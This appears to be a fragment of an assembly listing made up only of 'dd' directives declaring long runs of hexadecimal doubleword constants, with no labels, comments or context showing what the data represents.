dd 0C9D812ADh, 383F9ECh, 0AB2B1B16h, 7B441559h, 6DBB3B5Eh
dd 1FDFAB81h, 0E47466DCh, 0FF86EE85h, 0DEC4D8A4h, 7CA0348Bh
dd 7025F4E7h, 212B8AA0h, 225A275Eh, 4CAFC56Fh, 3B875B06h
dd 0C9C4DB7Ah, 89E78C33h, 91BFA6FDh, 0F8F52E25h, 465405BDh
dd 0B873D2B3h, 0BE6B63CBh, 2922C0F8h, 0EA3FAE34h, 6783C38Ah
dd 1A290BFAh, 4C300FA7h, 3B7A374Ah, 1B9EA36Ah, 0BD2ADC7Ah
dd 2A84E3BCh, 0A4861523h, 0D0BBE814h, 0DAFF243Fh, 1F52E6A1h
dd 3BF701AEh, 0A288DFE6h, 295B5589h, 75303F89h, 152B9050h
dd 0B77B905h, 5928EE51h, 370541D3h, 11FA4628h, 0EE79DC08h
dd 4E7303C9h, 9473AADCh, 77F8FD3Fh, 39F5FC72h, 6E6D86B6h
dd 7DDF3B6h, 42B355BCh, 27E80C51h, 8EEF2C98h, 9F68662Eh
dd 0A73C2994h, 89E01D36h, 9BC1460Bh, 6FE0176Ah, 0D6764EBEh
dd 0CB83C786h, 0B8436BA8h, 9C3C3AF1h, 1DF5913Ch, 0F38D4DEh
dd 8C1B6D9Bh, 0ADC613EDh, 3B3A461Bh, 6EA339E2h, 9FDC8D01h
dd 0F3086DA0h, 5A7B36F5h, 2D628BE9h, 5C9FDF18h, 2096EC54h
dd 1F036FE7h, 38057A8Ah, 0A1C5B575h, 0C163F145h, 8568575Ah
dd 89B5F900h, 20FA3ED4h, 0E954E2B8h, 0DD7E15C3h, 6F1395Ah
dd 9DB8E1FEh, 6AF475F1h, 9F28CE87h, 79107C4Bh, 0A20A0376h
dd 0DFC01357h, 0F6A34AF3h, 0AF489107h, 0CE568B70h, 0D4862BA5h
dd 420BD99Fh, 6BF4E0D4h
dd 41C349D8h, 50B1B513h, 0C0DF7F0h, 0EF945024h, 69FB2355h
dd 0F47CA3EEh, 854431B9h, 997556CCh, 0CFA4E5C3h, 6B3E053Eh
dd 0EBE48CCEh, 0F71DCF8Eh, 0BB01DABDh, 41DE2B45h, 2459A808h
dd 16661F88h, 390308C9h, 6411C76Bh, 0CF1F55C0h, 4015EBDh
dd 9ECD422h, 87D3EAE5h, 8A7B6A4Eh, 6D512572h, 0D5BB1DB5h
dd 0F49F6061h, 0EED644ABh, 618BF567h, 1E70A26Ah, 9352AE1Fh
dd 0E6931BF6h, 24556EFh, 342AB9AEh, 0B7C477B6h, 0F98C0F7Ah
dd 7D90FE68h, 96404A96h, 2FACE14Dh, 0F577EB66h, 5D441AE3h
dd 0DB6E26DBh, 0D7971360h, 71D5E69Dh, 29F0D575h, 5D3594B4h
dd 6C26AB7Dh, 0A7E7DD0Fh, 3FF77F3Dh, 8CE2D732h, 0BE208D96h
dd 46388A07h, 4FF9D16Fh, 0A20162EBh, 9399FA7Ch, 0A1BC1850h
dd 2EF3CB3Eh, 0FC6A163Eh, 0D1234BE7h, 0D87E325h, 0AE66181Eh
dd 0F0E8145h, 0EE6FA65Bh, 0F2FD487Eh, 3E1D21Fh, 0FE05FC4Ch
dd 393C57DAh, 5B2D0572h, 0A7F24BFDh, 9C5CB0BBh, 6C897F51h
dd 0FAEEFE0Eh, 5FE5E48Bh, 0FA61B2AEh, 241940E6h, 25755D04h
dd 0A83EF5Fh, 0D51B45AFh, 798ECA2Ah, 0DCA439B1h, 1238D3E5h
dd 0F8BAB804h, 0D81E0737h, 99C2C102h, 0AEB71C2Dh, 17EE820Bh
dd 0A0826BF6h, 6BAD603Eh, 0B19A9F48h, 0D237F7A6h, 0BC3B8AF7h
dd 0ECFA90DCh, 0C3A3DF3h, 0B678DFC7h, 0C1DF1F12h, 0C0BB9CA8h
dd 0B4CDF2E2h, 747DF857h, 472B4BD5h, 0AECCF815h, 6B468733h
dd 96E7D7B0h, 3E6C7CA7h, 5B2F2FC6h, 0BCD3A813h, 17126A5Bh
dd 95B54ED1h, 858FDE26h, 0AAB9AC52h, 0B41F0E21h, 76FF331Dh
dd 0F5008C4Dh, 0F392DE2Dh, 0EC948164h, 9BC08547h, 8CA3692Dh
dd 7E813EF5h, 0D7FB9AD3h, 48313195h, 3613A1DEh, 0AF62C8ABh
dd 0CC6CFA80h, 0C9A6EC0Dh, 54703D1h, 0BB2AB321h, 831EEF3h
dd 0ECFC8B8Bh, 0D795551Ah, 4E1C05D3h, 91B45898h, 9E2D7438h
dd 0BBD6532Dh, 0D09BFC76h, 1EEA0C5Ch, 0DD8F0F0Bh, 0EF739EE9h
dd 6754DF47h, 6480E71Ah, 0F1BC7810h, 0C8C8838Fh, 0D1DEB46Fh
dd 66EF6B34h, 0F742FE82h, 0E3EF08B3h, 0E745E9BBh, 1399D5FAh
dd 6080B705h, 0ADD241A7h, 0EF0156B9h, 5CE66F65h, 8DCCF195h
dd 0C91E36D8h, 1B5F1D8Ch, 9E04045Eh, 19C00AF4h, 7BD76B74h
dd 77236C25h, 1791D8F1h, 0A4613527h, 0F2733D78h, 102F138h
dd 0D647EFDh, 74B65128h, 7AA8CA29h, 4D8D1263h, 0BD8A07B7h
dd 734581FCh, 0D67B5295h, 698B405Bh, 3AA5916Fh, 0EFA168B2h
dd 0F426911Ah, 0C607E1B5h, 987D543Eh, 3917DF75h, 0FDFB3AECh
dd 7597008Ah, 95A32DA0h, 27AA5F43h, 0E3FD94D3h, 69C4C2D3h
dd 0CD8D6695h, 4B128038h, 7CEB5E2Fh, 0EAAA78CAh, 98A781FEh
dd 661D8553h, 0FCD889BCh, 70E6FD40h, 5771D72Dh, 16AB1523h
dd 94B325DEh, 0F65D7A45h, 0CD5EBB1Eh, 88F9CCFAh, 0D8F6C667h
dd 0FC6D79Ch, 0F56E4EBAh, 0B6033D9Ah, 2BFD4CD6h, 0D8E0BFF4h
dd 0A239CFBFh, 6EB58BEh, 4C96E2A5h, 0B68F0EE2h, 53E66BF4h
dd 0E02ACA48h, 450F23C1h, 0D4C9820Eh, 0D5A50F45h, 0ABF1DD6h
dd 736D6E0h, 0BEC76010h, 0E9E8ED32h, 791FEFF6h, 5F6EB404h
dd 0DE7E6B02h, 5FD9218Ah, 68CBF87Bh, 45F7FD12h, 0FC1CB5AAh
dd 4B405565h, 816E5267h, 0D2A88E94h, 31FD21F9h, 0B253433Ch
dd 5CB90087h, 0F1CA87E0h, 7D18B53Ch, 0CBB2EF7Ah, 97BDE471h
dd 0C63BEF5Fh, 9DFE5B99h, 226D601Ch, 86A36D33h, 0EA321C7Eh
dd 0BB8B28B9h, 675F1778h, 0FAA644FFh, 8AA8B56Ch, 1757796h
dd 95DB62h, 783E383Bh, 8837BC22h, 24317223h, 37CE56B6h
dd 0BB3EE5DCh, 2E14C940h, 60A6F500h, 0F15F0585h, 0A36E9F0Dh
dd 0DA948575h, 0EED16688h, 222A4F99h, 2E9C13A1h, 3E2BA51h
dd 5B1D5E15h, 0C65BCD16h, 7A8ED269h, 703CE8BEh, 8E31102Fh
dd 0EEF25F32h, 0D25030BCh, 0FB6254B2h, 0FF670FCFh, 0DBFE7BDFh
dd 9B22BA2Fh, 37DC5DF4h, 2BD82DF5h, 9A2BA39Bh, 0DF2EC237h
dd 0D2683390h, 95F49D4Eh, 0B7240579h, 9844BE92h, 84BA5555h
dd 0D4EC4ED2h, 0E1337963h, 4868BEA1h, 97EAE060h, 7AD03D84h
dd 0FB64A651h, 0C51612F8h, 0BDF2E9BEh, 46FD02F1h, 64DB15E1h
dd 0E0FF0B7Fh, 1075F135h, 15891262h, 0B80D75D5h, 5ED8C565h
dd 0C2205177h, 0AD9B7182h, 28ABCF29h, 0B79C2EE4h, 768AABCh
dd 379A48BCh, 0ACEFD15Fh, 1723583Ah, 773F3F03h, 0E681040Ah
dd 47C7F5A9h, 5D042EC6h, 5D0FC54Ah, 79AB6D33h, 5A107A85h
dd 5AD1D1FEh, 6422296Dh, 3AB09E90h, 0EC503ACDh, 1B6160DCh
dd 141556FAh, 0E72CAE09h, 0AFCCAFDCh, 0A7090F99h, 0FAD4552Ah
dd 54797DB0h, 74795BF4h, 894752FEh, 0E30057BFh, 0AA574223h
dd 890D33C6h, 2FC3C94Bh, 0A9F8081Fh, 4EB6EA89h, 0E9F45DC8h
dd 933D3FF5h, 2A85D78Eh, 60BB8FEFh, 6006C30Ah, 0B95EDD8Ah
dd 0E0E2673Bh, 8A0AB7F3h, 76B17159h, 519F39F2h, 105893FCh
dd 518BE5B1h, 701FBF54h, 69A86E12h, 247E16ACh, 6574B298h
dd 1E16CF57h, 6E9DB863h, 5DE1F8EDh, 0FD9DB2Dh, 1DD34F37h
dd 0FDA559EDh, 0BAFF1035h, 0CF28B653h, 7E168E4Dh, 197DAF19h
dd 0D6202A91h, 0E74EB68Ah, 0AB04A7C2h, 3ABA9E29h, 0F44F3B16h
dd 3B4139D8h, 65EF6D60h, 0C98BF734h, 537E3EAFh, 69D92C0Fh
dd 0DF26B118h, 6F7997E1h, 7EAECFD9h, 773FE0BFh, 0DEAD14A9h
dd 5A34B19Fh, 91AAD607h, 0D5EFE8EAh, 0E385F954h, 18EF3B7Ah
dd 0B7853EE1h, 0E2DEF0B5h, 16FDFFEAh, 3529D137h, 3A45AACFh
dd 37A9F1h, 0A402CF9Bh, 72264555h, 40FAD15Ah, 0AF0E9F27h
dd 53812FCBh, 2BD9D429h, 964554BDh, 21FB4D3Dh, 21D41942h
dd 7E5551C9h, 0B7381021h, 0AC5A27B0h, 8AF41DE6h, 3D916FAh
dd 0C6C157E7h, 79B47C7Ah, 0D35E1C2Fh, 0D4F65D5Ah, 87ACD26h
dd 0E70C5426h, 94054F17h, 0E5DE32CCh, 1F1209C3h, 7433C05Dh
dd 0EFE3703Dh, 0AECEEA90h, 0EC857DF4h, 2B605A9Dh, 0B3771F53h
dd 48DDDE5Ch, 6D78FAE9h, 4857BD6Fh, 0B3AF1938h, 0B73C4B03h
dd 0FD98F223h, 6BA3F44Bh, 2CA5A918h, 5F3A72A5h, 0FD58E65Ah
dd 0FAA4812Ah, 0D7C9D9DBh, 314EBFAh, 297A6DBEh, 7E78CE0h
dd 0D43325F9h, 0F53C5FDBh, 3AF02D65h, 39D2F2FBh, 0E687563Ch
dd 387FE317h, 7FEBA8E9h, 6360B04Ch, 53FF19A6h, 4717155Dh
dd 0C6FB4AAh, 0D131BE23h, 6CA399C9h, 5F6B3AA7h, 0B93D8697h
dd 962EE2C2h, 3BDB493Eh, 6B645A22h, 0D03DA173h, 0E9452EB1h
dd 0A9353DAh, 0AC825AFAh, 45A37F80h, 0F3E7419h, 0A18CF799h
dd 1B95107Ch, 2455796h, 0F1C36BC4h, 0EE9A2A77h, 6850FC7Eh
dd 0EB82BA97h, 0ACEA6EA7h, 320B0FC0h, 5FBBA848h, 0FA66715Ch
dd 8E5849EFh, 0B024B81Fh, 78BC5A71h, 3E2D46Dh, 1CDCC48Eh
dd 672BE585h, 16FF03C9h, 0BE7F49C2h, 0BF36EF3h, 5E0AE425h
dd 0D8AE7DF8h, 0FB3D6F19h, 0D812EDF0h, 970AAFE5h, 0A22F0752h
dd 207A5CC3h, 0EE7AD862h, 0FF0B84BAh, 0E54E0309h, 5647D59Eh
dd 89D0CDDh, 5F3B2F44h, 0F33A3E8h, 3E76A8D1h, 0C9C65E6Dh
dd 6AEF0723h, 0B14A45EFh, 0CB4A1658h, 291DFF07h, 0B40C36FBh
dd 4ACEC9F5h, 0A1B962B1h, 758FCD26h, 524FA057h, 28FA299h
dd 57449F0Eh, 0CF95B03Fh, 105A0535h, 5BE354D8h, 3F73DBBEh
dd 4946EF6Dh, 0A4E9BF12h, 6CBB8815h, 23AADA4Dh, 0DEDB707Dh
dd 0EBD3D67Fh, 5AAB04F7h, 0DEAAA776h, 7CE0613Bh, 85A19871h
dd 79301380h, 48DDF3EBh, 557B6EAh, 8E2F96AEh, 0E375E70h
dd 0BD378AAFh, 6BA7E2D1h
dd 75B228E4h, 0DB5F5C2Fh, 0FB5781FEh, 0B83E18B2h, 83262A15h
dd 32D21735h, 0A7AEDAE7h, 0E97D9769h, 0A4FF4E5Eh, 1FB702E1h
dd 9D5F8A9Bh, 837142C7h, 36B86697h, 0E9788D7Ah, 826DA247h
dd 0D07DAD14h, 42A27FC0h, 0D76228BFh, 66B12F3Ch, 268AE78Eh
dd 0EF9BF04Dh, 0A17C08B9h, 5A57ECCBh, 0D75BE1AEh, 4A636ABh
dd 0F7153DC7h, 7F17D169h, 0D82A753Dh, 24BD7C94h, 0BFB647D1h
dd 254ABDA2h, 9728AECBh, 0ABFC1E3Ch, 7303F7D7h, 64EB120Eh
dd 89A324E4h, 5B929DA5h, 0D44E6D42h, 8C22A9FAh, 7DED4A5Bh
dd 947AEB41h, 37325B81h, 0E3582916h, 6EE97E77h, 4F9AC07h
dd 0D4B61A8Dh, 0F6D4AB90h, 0ADD524ABh, 41A0C97Eh, 32497821h
dd 0B505D247h, 47DCFC53h, 0F9E3C0F1h, 489B93ECh, 0E26FB23Dh
dd 0DAEB62E5h, 0FA39510h, 95DB705h, 6C6A9EDEh, 67C52042h
dd 0F325BFDEh, 707D7093h, 20ED81F9h, 6DF07F5Ch, 65A2A99Bh
dd 39FA6DD2h, 4FDA43EEh, 365E88A6h, 7D654A7h, 77A7B4E1h
dd 0E6BAD71Fh, 0B704BC7Ch, 0E94B11EEh, 0FDF559B1h, 8A40E1F8h
dd 0EF8FE96Ch, 9157CE64h, 0EB439DBEh, 0D9CBCA11h, 0FC4705Dh
dd 0E8A33257h, 1943E9A8h, 50DF9D2Eh, 0E6E2AAF6h, 0C2686DCBh
dd 9EECE773h, 22F4F56h, 358EFC62h, 8FA8FCC0h, 93C1BE2Ah
dd 1827B12Bh, 57B95C0Bh, 45FC2E6Ah, 0E9E5D275h, 82377BD6h
dd 7693F1DFh, 89D23148h, 6DF0CE8h, 7D386AE2h, 15DA76CDh
dd 6C2F5E09h, 0D55B1D1Dh, 3E02314Ch, 96D17361h, 3DD9B13Ch
dd 0E2F99784h, 539F657Fh, 4AC95DCBh, 294FE3A4h, 0E40B767Ah
dd 0C731343Fh, 38106078h, 54BB24FFh, 0CAEE65D1h, 0FD761142h
dd 0A4DDD215h, 6D3491F7h, 0DE98B7C2h, 5DE7B6E1h, 0F8AEF8B1h
dd 0CF03D077h, 7AB2FC52h, 2D16AA63h, 7837B333h, 13ED3C8Bh
dd 65817BC7h, 305A7A76h, 0B7BBBF17h, 5CCA439Dh, 2AD84DECh
dd 3A83D938h, 0E3A3744Ah, 0F07811DCh, 0F2243A7h, 35F62E6Ah
dd 0E571A511h, 59371F66h, 0E260E03Ch, 0FB854A52h, 0F7683CAAh
dd 0CAD216A2h, 2AE43A69h, 574CE677h, 48B46E74h, 9EE8E813h
dd 9187F6DEh, 1AAD165h, 0C701DEAAh, 0C8379DAEh, 0A36D6D7h
dd 81E3F863h, 0D02FEE26h, 0F68E663h, 0C1DFB592h, 43BAFCC8h
dd 0DCCF6845h, 73F0F0ECh, 4C6703D7h, 0F7ECA2B9h, 95DCF032h
dd 12E894D4h, 5BBA2B28h, 9E0A2EB8h, 0E4C1F2DCh, 56FE1544h
dd 74C65222h, 81BFE7A7h, 615CFA20h, 5CE46DF7h, 5D559B10h
dd 5749150h, 3DF9618Bh, 3CA99DCBh, 0B8485FFFh, 68DA3C82h
dd 0C048AF3Fh, 0B5A36522h, 8EF22B00h, 0ABD0DF2Ch, 43365273h
dd 0EBEEA5ACh, 9253D0Fh, 45D4A770h, 0E5B590F1h, 4DE8E4ADh
dd 13EC835Bh, 37FBC189h, 82F1157Eh, 0D36D1DF9h, 0E05AE402h
dd 0BEC8785Ah, 0A9966F1Fh, 0DBF0E276h, 142C967Dh, 0C7AAEA1Bh
dd 992984C6h, 0C59FDBA0h, 0F5BAD721h, 4F2F90D2h, 0D4342717h
dd 0A27FA02h, 5FDDF3EFh, 0D301EF5Eh, 0E340BB77h, 4129BA5Fh
dd 0B98147Ah, 3707916Dh, 0F7779F48h, 42D1875Fh, 0E816F015h
dd 7DED767Dh, 0C5F4045Dh, 6F757F82h, 5173EB3Dh, 5F06EA6Eh
dd 0D49C7325h, 5154383Eh, 55C53BFDh, 6C5F85F9h, 7D82DB41h
dd 120A43BBh, 0A46EF54Bh, 83CD51D4h, 0FAE02894h, 15E99B47h
dd 0F8064F8Ah, 0B944C723h, 0C344A658h, 4B5FD3C6h, 25D2B021h
dd 0AAF6237Ch, 0EE981F95h, 0BF85C798h, 97F2CBFDh, 51D569DBh
dd 95BF6FE4h, 0C260F90Eh, 1C0EA96Ah, 37DA9B3Ah, 0F667EFC0h
dd 0DD7A2F47h, 0D67FD4Bh, 719F0D8Eh, 8E454E6Dh, 1DF9F6Ch
dd 35A2854Bh, 0C0FE9F9Bh, 8D3F66B7h, 0CA55D852h, 5F430CD6h
dd 452D1AAEh, 0DF7F798Bh, 0E6B8A8CAh, 4494CD1Eh, 2B44B3DFh
dd 69AA4B7Fh, 0C2D8D466h, 222D067Fh, 4F3A0487h, 3DFCE16Dh
dd 867CE60Fh, 0D6B044F9h, 229D426Eh, 744F1D54h, 611DE965h
dd 1E189F1Ch, 6F1419EDh, 2B4EB72Dh, 79183B44h, 60B56CBh
dd 38D174DFh, 9F2E6F23h, 8649D514h, 901C7EF0h, 516CC4A9h
dd 9A9D3EBEh, 0DA453707h, 5EF6BD6Fh, 15ABEAEFh, 5AA2E2AAh
dd 78A9AAE7h, 0E3768E81h, 0AED2B8A5h, 69CC884Ah, 0E26A5AA4h
dd 5A996DF7h, 20B93969h, 9504AD3Eh, 8BF3A23h, 1B743EBFh
dd 1712345Fh, 0B4CF818Ah, 14E0FA1h, 0B108D7DDh, 0DBE456CDh
dd 6F2159E6h, 9147E247h, 146F1DEh, 956B74B4h, 471DEE16h
dd 0EFF395DCh, 48451A13h, 3B25287h, 0A5BCF0Dh, 7C6D3C8h
dd 0D56F0BFEh, 69FF3FE0h, 276CFBEAh, 0ACA8A3AEh, 52CE06Dh
dd 3595F670h, 3FEC5ED0h, 0B58DC6DBh, 5733F8B8h, 0F353271h
dd 0EB04574Eh, 9BD7FCFBh, 0F41C2AB8h, 0F0FC6FCBh, 928DCFC8h
dd 1CC36EFCh, 0A05FB5BAh, 0E1E0403Dh, 0A8756206h, 0D9449742h
dd 0BA0AEDE6h, 0DC9F370Ch, 0EE3365F4h, 0A3DF2FFh, 38945DA8h
dd 17F82C58h, 1F54EA51h, 6F9C17F1h, 6A3BD782h, 45F85089h
dd 0E5C2F6ABh, 0DCCA6C3Ah, 0AEFD8950h, 1E2E4A1Eh, 7DD65EDh
dd 0C817E5CBh, 93BD7528h, 4B0491EEh, 0E2FF68A8h, 585C6B6Eh
dd 0F0D06BF8h, 0CA87A8AEh, 0A19FCAEEh, 23CAEA1Eh, 3736E168h
dd 8CE3AC98h, 77F154B1h, 0DD7EF362h, 0FEF87CDEh, 28E88C97h
dd 0C2BADBBh, 7DFA6E55h, 0DBDFAB40h, 27F4292Eh, 0C19FECAAh
dd 0BBE7A60Ch, 464F82EEh, 40A9BDD0h, 1E6A770h, 8D68D12Ah
dd 18B7CAD2h, 1F5B18C0h, 0D67F7EAh, 0A9726926h, 6992DF52h
dd 0A60B7F2Ah, 768CC534h, 992ADE07h, 0C7BA227Ah, 0DC1E1C7h
dd 0D148D5Dh, 3C16A2FFh, 399F53D3h, 243C6F78h, 0D409D37Dh
dd 0C92479D2h, 0BAFEB57Dh, 0B5BDC9D4h, 0B7D2D51h, 0F4BA69F6h
dd 33185C17h, 0E6A05E78h, 6CAAE964h, 9AC7D60Eh, 0EE86E5DAh
dd 0A16FB00Ah, 0EC9FED1Bh, 0AF14CCBAh, 886B3AF6h, 98BB7100h
dd 0B3AFFA60h, 7D7EFE56h, 0E2D605BBh, 6F1BD308h, 46D12477h
dd 0C556EDCFh, 1FD9A2C2h, 79BEAA98h, 0BCE16D5Ah, 57D2F6F2h
dd 2F927776h, 0D0A9748Ah, 5D17DDCAh, 0AEB41B3h, 6E85F8A8h
dd 5A22B381h, 0FF72AD9h, 249220FFh, 842B5A3Bh, 78D61924h
dd 0FC3C0F16h, 8384B9F3h, 0BF1BD51h, 0CE756E77h, 0D1051D2Ch
dd 561F80C5h, 3F768A02h, 90395C6Ah, 0FCB980DBh, 4E81FF97h
dd 0B7152BFCh, 549D01D8h, 7A7E9285h, 45346C42h, 20E575B6h
dd 0C0F6B8E5h, 0ECEB53DFh, 5F2AF732h, 627C0FEDh, 10020F87h
dd 62EB6CA3h, 96F76AD2h, 0FE220EADh, 0D0DE2D50h, 2D6E6A69h
dd 67F94840h, 0F90DAAC7h, 2840B5FEh, 0DCA5D2E7h, 0F079AAB0h
dd 4DBD9514h, 0A6F91AF4h, 8BFAC21Fh, 0EF5077C3h, 165F1A38h
dd 0D38E76C7h, 1467F6BFh, 44005BB8h, 0D4E07F32h, 0ED4492BCh
dd 973278BCh, 0CF45742Ah, 0AB6A0053h, 0E992B532h, 499DF2F1h
dd 65B12D45h, 417546FBh, 389DEE8Dh, 0F0780ECEh, 0F6FEEBB0h
dd 80D69A04h, 579B2734h, 0EF45D9BEh, 0CCB6AF17h, 0B77F1A8Dh
dd 0A626BF79h, 7DAA8E2Ch, 376BD42Fh, 0E0B87136h, 0D1C0C48Fh
dd 2473D4BAh, 0A5776F25h, 0EB779E44h, 207CF556h, 0CF32792Bh
dd 497FEE53h, 3065E64Bh, 55DA092Eh, 0BC7EA18Bh, 0E2A99D2Bh
dd 0EC2C9ACEh, 72EA3154h, 0B7272F9h, 47869D49h, 1BE7A102h
dd 9FDFADFFh, 0B4567D00h, 6DCA9AF7h, 1950B5B7h, 570C0FDAh
dd 9BAFEA7Fh, 94B83AB6h, 0BE58DFDh, 0A0B21F83h, 0D929729Dh
dd 0D9E18E03h, 0A59DE13Ch, 0CBCE0B37h, 895F2AF0h, 4FAF756Bh
dd 4436F3A4h, 0BD2F9185h, 0BBF5CE1h, 7DF8CF08h, 0BB3E5A1h
dd 992D3D8Fh, 8FE8AAA3h
dd 1E032FC2h, 0F30FC378h, 0F8CD00DFh, 0B8DEEAF7h, 0B8F47E2Eh
dd 1D9C839Bh, 89F6AAD6h, 3A3C095Ch, 17E0AE74h, 4664182Ch
dd 346557ABh, 0DAB4AD40h, 0DC9EDC0Fh, 0A7898D08h, 361973B4h
dd 0C664D746h, 92D1977Dh, 801B63C6h, 555875B6h, 0B657511Bh
dd 37704561h, 66DCF291h, 0B47975D5h, 95123BCDh, 3FF5C41h
dd 0B90DD917h, 741247F3h, 15B39591h, 53DEEAFh, 70A1827Dh
dd 0EDCAF0F0h, 0EEE295D2h, 9CBFE442h, 5EB7AF0Ch, 0B3C1D709h
dd 6F3C9E02h, 0E4D9EE36h, 0EE44CE62h, 0F49E602Fh, 0DCD0AB70h
dd 3E1281E7h, 0D3032B72h, 92FC55D4h, 92F346AFh, 0B629C682h
dd 0D5006602h, 0AA113A6h, 83BF945Ch, 3FE093CAh, 310FC7EEh
dd 0CFAB0BFh, 1196E6E0h, 54EF6E2Bh, 9B54C451h, 0ACCE9213h
dd 0D412C3A5h, 0A21CAFA7h, 0E269A66Bh, 0A06D1E9Ch, 63A4C808h
dd 0B3B96773h, 76E144AAh, 3F228AE7h, 0CE6855F3h, 0F5B99975h
dd 4E8A331Fh, 35505552h, 12DDCB38h, 64B38B60h, 0DC00A8B4h
dd 14C65D0Dh, 2AF6316Ch, 0D6E22E25h, 0FD5B5A36h, 617E0B2Dh
dd 0E5EDD3Dh, 0CE2A2B05h, 71AA2A89h, 0AEF025D8h, 0D32EC27Dh
dd 0E6F3D46Dh, 1059D343h, 37E389C3h, 555A6FBCh, 0BE17D6D4h
dd 51C6879Eh, 94B4CEF4h, 8B5A2C36h, 50DBDBFAh, 961F5475h
dd 16885BCCh, 280F3F18h, 66FA2707h, 0D5DF303Fh, 3A265FE0h
dd 59FD3E0Eh, 45CB0BB2h, 0C4ADB16Eh, 290A5F86h, 786FC10Dh
dd 0C1F46BECh, 0BDB9CAC7h, 0EDA57F09h, 0A256173Fh, 69F2EA9Ah
dd 0E4726F78h, 0B8BA6BDAh, 0D81ABEC6h, 0B729F99h, 0A5920EA1h
dd 3614EFF0h, 0BA7C3292h, 0D9771942h, 4AEE7BAh, 719552A1h
dd 5174F47h, 5F249352h, 2BDCEA2h, 5CDCE840h, 6876B60Fh
dd 12A8DD9Fh, 8A43041Bh, 7A20625Ah, 35B6B523h, 0F272A1A1h
dd 0E4A6C06Dh, 0E19D377Eh, 23C5ABAFh, 419FFFC9h, 79FEDDDCh
dd 957497B6h, 0F3850C2Ch, 9FA91BA0h, 7157141Bh, 88ACA197h
dd 8EE236AFh, 0BD68B251h, 454FAEDDh, 0E60611B0h, 4077AB01h
dd 112E53Eh, 8E88AFE5h, 5669ECDFh, 7FCBBC59h, 45AC28DEh
dd 0BDCE8EA8h, 0B81ADE7Ah, 4AEAC70Dh, 0D6D6D5ADh, 153BEECFh
dd 0F5EC0F3h, 0A99DE2B9h, 0BE0F1A3Eh, 0B5A63CEh, 0FCB53CF3h
dd 409F4586h, 0DF7D80D7h, 0FB77C0F2h, 0B0D588BCh, 9CBF0B83h
dd 97B96097h, 2A9157E0h, 0C4E0F222h, 0EF63DA45h, 67781776h
dd 7C7D1AA0h, 0ACEA1623h, 0E37775A2h, 0CB60D64Ch, 0EC8E0BF9h
dd 730AF866h, 0AC1A8F3Ah, 8A6962C1h, 51634867h, 5EC0A3A8h
dd 9B4BCAFCh, 0B5DEF9E3h, 0D943DE34h, 0C0C7E2B1h, 81FBD325h
dd 3AC8397Fh, 3D6A4124h, 0F997F7EAh, 0E63CD8E1h, 7E392BFCh
dd 2D524EF8h, 0D3155AAFh, 4D175157h, 43D1550Fh, 9A1F89EEh
dd 28619ECCh, 0D0376B69h, 0AFA49200h, 0AF0232A5h, 6DD6F6FCh
dd 575984EFh, 0D1639F73h, 0B4053B33h, 0F1C587E3h, 0A36ED7C6h
dd 15D40EBAh, 1435D051h, 94553FBDh, 97D01701h, 67CF535Dh
dd 4F74A95Ah, 273C8A8Dh, 76B43FD0h, 755F9593h, 8BB657C5h
dd 65356E85h, 0B6FAA639h, 0DD88998Ch, 0E5A35F42h, 51D18EFEh
dd 1D6241BEh, 895586E5h, 0A544A95Dh, 0B49D242Dh, 4A8E0EFh
dd 0F7A79AE4h, 0D424EBA1h, 71E0D2D0h, 389E8891h, 0FDAD9A7Dh
dd 20722D3Bh, 5CA079D5h, 0CFDE99B6h, 63313649h, 0CFDA6381h
dd 0FB6A6BF7h, 5F6295E4h, 321F829Fh, 0ECC110BEh, 2B28AB47h
dd 9688A73Ah, 24AA125Ah, 8A8E04C4h, 0EE9878Eh, 0B8093EA5h
dd 5B7C968Ch, 0B7170C1Fh, 20B3B26h, 0EC473922h, 78836703h
dd 0C555E584h, 5F8ED9FDh, 3D4F0C0h, 5FD882E1h, 607D5D9Bh
dd 0CE1BA85Fh, 0C58EA174h, 142B0FD9h, 0E1D9E8DAh, 9EAD51B4h
dd 57A64AE1h, 0F3600DEEh, 6BF9B825h, 67027739h, 0D488608Bh
dd 0FC689C0Fh, 3CC8BF06h, 0FB03916Ah, 0D53FDB9Eh, 0BF7B19E5h
dd 0E2515514h, 394AF4DDh, 0D3564527h, 0D979DCA4h, 0BFCB21FEh
dd 0D357156Ch, 0CB9A664Dh, 0DCC5C497h, 518D3A98h, 55476419h
dd 9FDC6D6Fh, 997EB14Eh, 649C0578h, 11457EC0h, 4EA601B3h
dd 53D896FBh, 9A0E5FE2h, 76698F6Fh, 26D7F9Bh, 0A6CD3FBAh
dd 0A417D403h, 0C071D07Fh, 1A60AEC1h, 73DCF2FFh, 9CDCDE4Bh
dd 0AC728E24h, 0AED557E0h, 6A1A36C5h, 360274F7h, 0BECA490h
dd 7151EE2Bh, 0FC092EA8h, 0E0A38529h, 0A170BB34h, 8F02193Ah
dd 37CA9489h, 9FC774ADh, 6828B52Ah, 0E8A37072h, 0AAADA560h
dd 671CD973h, 75105591h, 733F2068h, 0A361ED51h, 5D9C4AA6h
dd 8A0B970Ch, 8E4BEAA9h, 1349A6F4h, 0E4AB2AB5h, 18A34714h
dd 0C14AF8D8h, 5EC812F6h, 30968BF7h, 0AACB43ACh, 2C424350h
dd 0D3C174BCh, 8571D629h, 3798E172h, 20EBE3D1h, 29BC507Bh
dd 48350A5Ah, 3591AB2Ch, 0E1796EE6h, 0C1D69E95h, 7E401B48h
dd 0FE7DA553h, 0CD25A2A2h, 0E912DB0Dh, 0FA990771h, 552E53EFh
dd 28799124h, 0B9BAC08h, 0BF87D086h, 0ECF814D0h, 35512955h
dd 0D4BFEA07h, 78BE2C5Ah, 9DD7DEFDh, 0BFBB85F5h, 0BB2015FAh
dd 4CD4D0B5h, 0DA4D0448h, 0CC37EEE5h, 58FE6398h, 1F0CAB2Bh
dd 16910B94h, 49DEB3CEh, 499A662Fh, 0EF864CFEh, 0EF96934Dh
dd 0B618172Ah, 0CADEADFDh, 0B2E2E739h, 90A9FF68h, 2D167F2Ch
dd 0FE70BFD1h, 0D7550E16h, 5FA3F98Ch, 83C96562h, 0F4DAC5C0h
dd 0B81C3FB8h, 0B026E9E7h, 21F8DA87h, 71691BAAh, 71455B85h
dd 1B0B8C96h, 9B8DAF55h, 5916D4D0h, 9D66221Fh, 8F37681h
dd 7204D767h, 9FFDDCD4h, 8124356Ch, 0E9A60FD5h, 0A496C222h
dd 11D9F563h, 0C9D921BCh, 9FA5EFE6h, 7F0C72CEh, 4F8B32EFh
dd 7FC90412h, 0B79D6881h, 760EF2F0h, 8A14B753h, 16A8CE6Fh
dd 0B58AECE6h, 0CD5D7C7Ah, 0CE5B5290h, 15FB4192h, 0E055155Bh
